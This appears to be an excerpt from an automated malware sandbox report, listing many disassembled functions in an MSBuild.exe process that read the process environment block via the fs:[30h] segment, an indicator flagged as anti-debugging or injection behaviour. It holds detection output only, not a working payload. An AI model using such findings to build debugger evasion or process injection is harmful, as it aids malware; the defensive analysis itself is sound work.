                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01416420 mov eax, dword ptr fs:[00000030h]9_2_01416420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01416420 mov eax, dword ptr fs:[00000030h]9_2_01416420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01416420 mov eax, dword ptr fs:[00000030h]9_2_01416420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01416420 mov eax, dword ptr fs:[00000030h]9_2_01416420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01416420 mov eax, dword ptr fs:[00000030h]9_2_01416420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01416420 mov eax, dword ptr fs:[00000030h]9_2_01416420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01416420 mov eax, dword ptr fs:[00000030h]9_2_01416420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138645D mov eax, dword ptr fs:[00000030h]9_2_0138645D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE443 mov eax, dword ptr fs:[00000030h]9_2_013CE443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE443 mov eax, dword ptr fs:[00000030h]9_2_013CE443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE443 mov eax, dword ptr fs:[00000030h]9_2_013CE443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE443 mov eax, dword ptr fs:[00000030h]9_2_013CE443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE443 mov eax, dword ptr fs:[00000030h]9_2_013CE443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE443 mov eax, dword ptr fs:[00000030h]9_2_013CE443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE443 mov eax, dword ptr fs:[00000030h]9_2_013CE443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE443 mov eax, dword ptr fs:[00000030h]9_2_013CE443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C44B0 mov ecx, dword ptr fs:[00000030h]9_2_013C44B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013964AB mov eax, dword ptr fs:[00000030h]9_2_013964AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013904E5 mov ecx, dword ptr fs:[00000030h]9_2_013904E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0144A49A mov eax, dword ptr fs:[00000030h]9_2_0144A49A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141A4B0 mov eax, dword ptr fs:[00000030h]9_2_0141A4B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C273C mov eax, dword ptr fs:[00000030h]9_2_013C273C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C273C mov ecx, dword ptr fs:[00000030h]9_2_013C273C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C273C mov eax, dword ptr fs:[00000030h]9_2_013C273C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01414755 mov eax, dword ptr fs:[00000030h]9_2_01414755
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CC720 mov eax, dword ptr fs:[00000030h]9_2_013CC720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CC720 mov eax, dword ptr fs:[00000030h]9_2_013CC720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141E75D mov eax, dword ptr fs:[00000030h]9_2_0141E75D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01390710 mov eax, dword ptr fs:[00000030h]9_2_01390710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C0710 mov eax, dword ptr fs:[00000030h]9_2_013C0710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CC700 mov eax, dword ptr fs:[00000030h]9_2_013CC700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01398770 mov eax, dword ptr fs:[00000030h]9_2_01398770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0770 mov eax, dword ptr fs:[00000030h]9_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01390750 mov eax, dword ptr fs:[00000030h]9_2_01390750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2750 mov eax, dword ptr fs:[00000030h]9_2_013D2750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2750 mov eax, dword ptr fs:[00000030h]9_2_013D2750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140C730 mov eax, dword ptr fs:[00000030h]9_2_0140C730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C674D mov esi, dword ptr fs:[00000030h]9_2_013C674D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C674D mov eax, dword ptr fs:[00000030h]9_2_013C674D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C674D mov eax, dword ptr fs:[00000030h]9_2_013C674D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014107C3 mov eax, dword ptr fs:[00000030h]9_2_014107C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013907AF mov eax, dword ptr fs:[00000030h]9_2_013907AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141E7E1 mov eax, dword ptr fs:[00000030h]9_2_0141E7E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013947FB mov eax, dword ptr fs:[00000030h]9_2_013947FB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013947FB mov eax, dword ptr fs:[00000030h]9_2_013947FB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143678E mov eax, dword ptr fs:[00000030h]9_2_0143678E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B27ED mov eax, dword ptr fs:[00000030h]9_2_013B27ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B27ED mov eax, dword ptr fs:[00000030h]9_2_013B27ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B27ED mov eax, dword ptr fs:[00000030h]9_2_013B27ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014447A0 mov eax, dword ptr fs:[00000030h]9_2_014447A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139C7C0 mov eax, dword ptr fs:[00000030h]9_2_0139C7C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139262C mov eax, dword ptr fs:[00000030h]9_2_0139262C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C6620 mov eax, dword ptr fs:[00000030h]9_2_013C6620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C8620 mov eax, dword ptr fs:[00000030h]9_2_013C8620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AE627 mov eax, dword ptr fs:[00000030h]9_2_013AE627
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2619 mov eax, dword ptr fs:[00000030h]9_2_013D2619
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145866E mov eax, dword ptr fs:[00000030h]9_2_0145866E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145866E mov eax, dword ptr fs:[00000030h]9_2_0145866E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A260B mov eax, dword ptr fs:[00000030h]9_2_013A260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A260B mov eax, dword ptr fs:[00000030h]9_2_013A260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A260B mov eax, dword ptr fs:[00000030h]9_2_013A260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A260B mov eax, dword ptr fs:[00000030h]9_2_013A260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A260B mov eax, dword ptr fs:[00000030h]9_2_013A260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A260B mov eax, dword ptr fs:[00000030h]9_2_013A260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A260B mov eax, dword ptr fs:[00000030h]9_2_013A260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C2674 mov eax, dword ptr fs:[00000030h]9_2_013C2674
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E609 mov eax, dword ptr fs:[00000030h]9_2_0140E609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CA660 mov eax, dword ptr fs:[00000030h]9_2_013CA660
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CA660 mov eax, dword ptr fs:[00000030h]9_2_013CA660
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AC640 mov eax, dword ptr fs:[00000030h]9_2_013AC640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C66B0 mov eax, dword ptr fs:[00000030h]9_2_013C66B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CC6A6 mov eax, dword ptr fs:[00000030h]9_2_013CC6A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01394690 mov eax, dword ptr fs:[00000030h]9_2_01394690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01394690 mov eax, dword ptr fs:[00000030h]9_2_01394690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014106F1 mov eax, dword ptr fs:[00000030h]9_2_014106F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014106F1 mov eax, dword ptr fs:[00000030h]9_2_014106F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E6F2 mov eax, dword ptr fs:[00000030h]9_2_0140E6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E6F2 mov eax, dword ptr fs:[00000030h]9_2_0140E6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E6F2 mov eax, dword ptr fs:[00000030h]9_2_0140E6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E6F2 mov eax, dword ptr fs:[00000030h]9_2_0140E6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CA6C7 mov ebx, dword ptr fs:[00000030h]9_2_013CA6C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CA6C7 mov eax, dword ptr fs:[00000030h]9_2_013CA6C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464940 mov eax, dword ptr fs:[00000030h]9_2_01464940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01410946 mov eax, dword ptr fs:[00000030h]9_2_01410946
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01388918 mov eax, dword ptr fs:[00000030h]9_2_01388918
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01388918 mov eax, dword ptr fs:[00000030h]9_2_01388918
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01434978 mov eax, dword ptr fs:[00000030h]9_2_01434978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01434978 mov eax, dword ptr fs:[00000030h]9_2_01434978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141C97C mov eax, dword ptr fs:[00000030h]9_2_0141C97C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E908 mov eax, dword ptr fs:[00000030h]9_2_0140E908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E908 mov eax, dword ptr fs:[00000030h]9_2_0140E908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D096E mov eax, dword ptr fs:[00000030h]9_2_013D096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D096E mov edx, dword ptr fs:[00000030h]9_2_013D096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D096E mov eax, dword ptr fs:[00000030h]9_2_013D096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141C912 mov eax, dword ptr fs:[00000030h]9_2_0141C912
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B6962 mov eax, dword ptr fs:[00000030h]9_2_013B6962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B6962 mov eax, dword ptr fs:[00000030h]9_2_013B6962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B6962 mov eax, dword ptr fs:[00000030h]9_2_013B6962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0142892B mov eax, dword ptr fs:[00000030h]9_2_0142892B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141892A mov eax, dword ptr fs:[00000030h]9_2_0141892A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014269C0 mov eax, dword ptr fs:[00000030h]9_2_014269C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013909AD mov eax, dword ptr fs:[00000030h]9_2_013909AD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013909AD mov eax, dword ptr fs:[00000030h]9_2_013909AD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145A9D3 mov eax, dword ptr fs:[00000030h]9_2_0145A9D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A0 mov eax, dword ptr fs:[00000030h]9_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141E9E0 mov eax, dword ptr fs:[00000030h]9_2_0141E9E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C29F9 mov eax, dword ptr fs:[00000030h]9_2_013C29F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C29F9 mov eax, dword ptr fs:[00000030h]9_2_013C29F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A9D0 mov eax, dword ptr fs:[00000030h]9_2_0139A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A9D0 mov eax, dword ptr fs:[00000030h]9_2_0139A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A9D0 mov eax, dword ptr fs:[00000030h]9_2_0139A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A9D0 mov eax, dword ptr fs:[00000030h]9_2_0139A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A9D0 mov eax, dword ptr fs:[00000030h]9_2_0139A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A9D0 mov eax, dword ptr fs:[00000030h]9_2_0139A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C49D0 mov eax, dword ptr fs:[00000030h]9_2_013C49D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014189B3 mov esi, dword ptr fs:[00000030h]9_2_014189B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014189B3 mov eax, dword ptr fs:[00000030h]9_2_014189B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014189B3 mov eax, dword ptr fs:[00000030h]9_2_014189B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CA830 mov eax, dword ptr fs:[00000030h]9_2_013CA830
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B2835 mov eax, dword ptr fs:[00000030h]9_2_013B2835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B2835 mov eax, dword ptr fs:[00000030h]9_2_013B2835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B2835 mov eax, dword ptr fs:[00000030h]9_2_013B2835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B2835 mov ecx, dword ptr fs:[00000030h]9_2_013B2835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B2835 mov eax, dword ptr fs:[00000030h]9_2_013B2835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B2835 mov eax, dword ptr fs:[00000030h]9_2_013B2835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01426870 mov eax, dword ptr fs:[00000030h]9_2_01426870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01426870 mov eax, dword ptr fs:[00000030h]9_2_01426870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141E872 mov eax, dword ptr fs:[00000030h]9_2_0141E872
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141E872 mov eax, dword ptr fs:[00000030h]9_2_0141E872
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141C810 mov eax, dword ptr fs:[00000030h]9_2_0141C810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01394859 mov eax, dword ptr fs:[00000030h]9_2_01394859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01394859 mov eax, dword ptr fs:[00000030h]9_2_01394859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C0854 mov eax, dword ptr fs:[00000030h]9_2_013C0854
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143483A mov eax, dword ptr fs:[00000030h]9_2_0143483A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143483A mov eax, dword ptr fs:[00000030h]9_2_0143483A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A2840 mov ecx, dword ptr fs:[00000030h]9_2_013A2840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014608C0 mov eax, dword ptr fs:[00000030h]9_2_014608C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145A8E4 mov eax, dword ptr fs:[00000030h]9_2_0145A8E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01390887 mov eax, dword ptr fs:[00000030h]9_2_01390887
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CC8F9 mov eax, dword ptr fs:[00000030h]9_2_013CC8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CC8F9 mov eax, dword ptr fs:[00000030h]9_2_013CC8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141C89D mov eax, dword ptr fs:[00000030h]9_2_0141C89D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE8C0 mov eax, dword ptr fs:[00000030h]9_2_013BE8C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01438B42 mov eax, dword ptr fs:[00000030h]9_2_01438B42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01426B40 mov eax, dword ptr fs:[00000030h]9_2_01426B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01426B40 mov eax, dword ptr fs:[00000030h]9_2_01426B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145AB40 mov eax, dword ptr fs:[00000030h]9_2_0145AB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01444B4B mov eax, dword ptr fs:[00000030h]9_2_01444B4B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01444B4B mov eax, dword ptr fs:[00000030h]9_2_01444B4B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01462B57 mov eax, dword ptr fs:[00000030h]9_2_01462B57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01462B57 mov eax, dword ptr fs:[00000030h]9_2_01462B57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01462B57 mov eax, dword ptr fs:[00000030h]9_2_01462B57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01462B57 mov eax, dword ptr fs:[00000030h]9_2_01462B57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143EB50 mov eax, dword ptr fs:[00000030h]9_2_0143EB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BEB20 mov eax, dword ptr fs:[00000030h]9_2_013BEB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BEB20 mov eax, dword ptr fs:[00000030h]9_2_013BEB20
